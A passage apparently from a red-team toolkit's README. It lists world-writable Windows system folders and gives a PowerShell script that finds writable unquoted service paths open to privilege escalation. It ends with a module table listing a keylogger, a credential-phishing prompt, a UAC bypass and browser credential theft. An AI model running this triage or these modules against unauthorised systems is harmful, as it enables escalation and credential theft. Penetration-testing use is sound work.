C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```

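An unquoted service path is only a finding when the current token can write to one of the directories the loader will try first (`C:\` for `C:\Program Files\...`, then `C:\Program Files\` and so on), and the same write test is what you want against the world-writable folder list above. The block below is an added example, not venom's code: it resolves the token's SIDs, evaluates the directory ACL (skipping inherit-only entries and letting an explicit Deny win) without writing anything to disk, and then walks every unquoted service path to report only the hijack candidates that are actually writable. It assumes Windows PowerShell 5.1 with CIM access to `Win32_Service`.

```powershell
# Added example (not venom's code): writable-directory check + unquoted service path
# triage. Assumptions: Windows PowerShell 5.1; CIM access to Win32_Service; nothing is written.

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # SIDs carried by the token: the user plus every group (Everyone, Users, Authenticated Users, ...)
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }

    # WriteData (= CreateFiles) is the bit that lets us drop a file; generic rights also imply it
    $WRITE_DATA = 0x2; $GENERIC_WRITE = 0x40000000; $GENERIC_ALL = 0x10000000
    $mask = $WRITE_DATA -bor $GENERIC_WRITE -bor $GENERIC_ALL

    $applicable = foreach ($ace in $acl.Access) {
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }    # 2 = InheritOnly: not for this dir
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $mask) -ne 0) { $ace }
    }
    # an explicit Deny on a write right wins over any Allow
    if ($applicable | Where-Object { $_.AccessControlType -eq 'Deny' }) { return $false }
    return [bool]($applicable | Where-Object { $_.AccessControlType -eq 'Allow' })
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' } |
        ForEach-Object {
            $svc = $_
            # binary path = everything up to the first .exe; anything after it is arguments
            $m = [regex]::Match($svc.PathName, '^(.+?\.exe)', 'IgnoreCase')
            if (-not $m.Success) { return }
            $exe = $m.Groups[1].Value
            if ($exe -notmatch '\s') { return }           # no space before the .exe: nothing to hijack
            # For "C:\Program Files\My App\svc.exe" the loader tries C:\Program.exe,
            # then "C:\Program Files\My.exe", before the real binary.
            $parts = $exe -split '\s+'
            $candidates = for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
            foreach ($c in $candidates) {
                [PSCustomObject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    RunAs     = $svc.StartName
                    PathName  = $svc.PathName
                    Candidate = $c
                    Writable  = Test-WritableByCurrentUser -Directory (Split-Path $c -Parent)
                }
            }
        }
}

# Usage: only the exploitable rows, then the same write test against a known-writable folder.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
Test-WritableByCurrentUser -Directory 'C:\Windows\Tasks'
```

Run it from the shell whose token you actually hold (not an elevated one) or the ACL answer describes the wrong principal; and treat a `Writable` hit as the start of the check, not the end: the service also has to restart (`StartMode` Auto plus a reboot, or a `CanStop` service you can bounce) and run as an account worth having (`RunAs`).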
[^] - Jump to Top


:octocat: Auxiliary-Modules

| Module | Description |
|---|---|
| GetBrowsers.ps1 | Enumerate remote host browsers (home page, browser versions, accepted language, download directory, history, bookmarks, extensions, start page, stored credentials, User-Agent, stored logins) |
| CredsPhish.ps1 | Standalone PowerShell script that prompts the current user for a valid credential |
| CompDefault.ps1 | UAC bypass module, or executes one command with high privileges (Admin) |
| keylooger.ps1 | Standalone PowerShell script to capture keyboard keystrokes |
| webserver.ps1 | Cmdlet to download files from the compromised PC |

[^] - Jump to Top


:octocat: SSA RedTeam @2020